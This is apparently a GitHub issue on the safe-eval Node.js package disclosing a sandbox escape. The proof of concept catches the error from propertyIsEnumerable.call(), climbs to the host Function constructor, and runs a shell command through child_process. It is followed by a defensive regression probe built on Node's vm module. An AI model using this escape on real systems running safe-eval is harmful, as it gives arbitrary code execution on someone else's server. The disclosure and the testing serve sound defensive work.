hacksparrow / safe-eval

Safer version of eval()

Sandbox Escape Bug #34

Open seongil-wi opened 1 year ago

seongil-wi commented 1 year ago
// node version: 19.8.1
// safe-eval version: 0.4.1

var safeEval = require('safe-eval')

let code = `
(function () {
  try {
    propertyIsEnumerable.call();
  } catch (pp) {
    pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag');
  }
})()
`
safeEval(code);

We found a sandbox escaping bug. This bug can be triggered by calling the propertyIsEnumerable.call() function. Also, we can execute arbitrary shell code using the process module.
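
A regression probe for the leak reported above, as an added example that is not part of the original issue or of safe-eval's code. It uses Node's built-in `vm` module directly and only compares object identities; the names `PROBE` and `hostRealmLeaks` are assumptions made for illustration.

```javascript
const vm = require('vm')

// Runs inside the context. It only collects references to the Function
// constructor reachable by each path and never invokes them.
const PROBE = `
(function () {
  const found = {}
  // Path 1: constructor chain of the context's global object.
  try { found.globalConstructor = this.constructor.constructor } catch (e) {}
  // Path 2 (this report): error thrown by a builtin resolved as a global.
  try { propertyIsEnumerable.call() } catch (err) {
    found.thrownError = err.constructor.constructor
  }
  return found
}).call(this)
`

// Returns the names of the probe paths that reach the host realm's Function.
// `sandbox` becomes the global object of a fresh vm context.
function hostRealmLeaks (sandbox) {
  const found = vm.runInNewContext(PROBE, sandbox, { timeout: 1000 })
  return Object.keys(found).filter((path) => found[path] === Function)
}

// Constructed inputs: an ordinary object literal (it inherits from the host's
// Object.prototype) and an object with no prototype at all.
const inheriting = hostRealmLeaks({})
const nullProto = hostRealmLeaks(Object.create(null))

console.log('plain {} sandbox leaks via:', inheriting)
console.log('Object.create(null) sandbox leaks via:', nullProto)
```

An empty result for the null-prototype sandbox covers only these two paths: a host object passed in as a context value exposes its own constructor chain the same way, and the Node.js documentation states that `vm` is not a security mechanism.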